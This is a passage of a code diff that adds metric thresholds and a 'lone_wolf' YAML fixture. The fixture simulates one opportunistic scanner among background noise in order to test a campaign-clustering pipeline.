+# its own cluster; that's a perfect score.
+#
+# Bounds are deliberately loose at first — we ratchet them up as the
+# algorithm matures. Loosening any bound to make CI pass requires
+# justification in the PR description (per CAMPAIGN_CLUSTERING.md §2).
+adjusted_rand_index:
+  min: 0.85
+homogeneity:
+  min: 0.90
+completeness:
+  min: 0.80
+singleton_recall:
+  min: 0.95
--- a/tests/fixtures/campaigns/lone_wolf.yaml
+++ b/tests/fixtures/campaigns/lone_wolf.yaml
@@ -0,0 +1,32 @@
+# Fixture 3 (lone_wolf) — see development/CAMPAIGN_CLUSTERING.md §2.
+#
+# One opportunistic scanner, Delivery phase only, no follow-up, no shared
+# signals with anyone else. Surrounded by background noise. The clusterer
+# must keep the wolf and every noise scanner as their own singleton —
+# none should be absorbed into anyone else.
+#
+# This is the simplest of the six fixtures and exists primarily to prove
+# the end-to-end pipeline (DSL → factory → clusterer → metrics) before
+# we invest in the harder scenarios.
+corpus:
+  campaigns:
+    - campaign:
+        id: lone-wolf-001
+        actors:
+          - id: wolf-a
+            asn: 14061
+            ip_pool: sticky
+            ja3: null
+            hassh: null
+            hours_active_utc: [3, 4, 5]
+            jitter_seconds: 30
+        phases:
+          - name: delivery
+            actor: wolf-a
+            target_selector:
+              service: any
+              count: 1
+            dwell_seconds: 1
+        duration_days: 1
+  noise:
+    scanner_count: 8